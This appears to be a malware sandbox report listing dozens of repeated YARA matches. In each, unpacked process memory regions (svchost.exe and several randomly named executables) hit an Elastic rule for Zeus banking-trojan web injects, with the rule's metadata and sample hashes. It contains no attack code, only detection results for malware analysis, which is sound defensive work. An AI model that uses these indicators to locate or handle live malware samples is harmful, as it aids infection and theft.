Source: 2.3.svchost.exe.889400.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.swvGCAxOMikYQeoQzimiprVu.exe.1590000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.16.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 29.2.swvGCAxOMikYQeoQzimiprVu.exe.12a0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.swvGCAxOMikYQeoQzimiprVu.exe.a42000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.Z8eHwAvqAh.exe.406400.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.24.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 35.2.swvGCAxOMikYQeoQzimiprVu.exe.20d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.27.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.30.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 37.2.swvGCAxOMikYQeoQzimiprVu.exe.ae2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 33.2.swvGCAxOMikYQeoQzimiprVu.exe.1292000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.30.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.Z8eHwAvqAh.exe.6184c0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.swvGCAxOMikYQeoQzimiprVu.exe.1532000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.40.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.swvGCAxOMikYQeoQzimiprVu.exe.1532000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.17.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.88a000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.swvGCAxOMikYQeoQzimiprVu.exe.12e0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 35.2.swvGCAxOMikYQeoQzimiprVu.exe.6a2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.38.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.Z8eHwAvqAh.exe.61d8c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.18.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.23.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.34.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 29.2.swvGCAxOMikYQeoQzimiprVu.exe.1202000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 33.2.swvGCAxOMikYQeoQzimiprVu.exe.12f0000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.swvGCAxOMikYQeoQzimiprVu.exe.1590000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.swvGCAxOMikYQeoQzimiprVu.exe.1282000.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.34.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.12.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 35.2.swvGCAxOMikYQeoQzimiprVu.exe.20d0000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.26.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.14.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
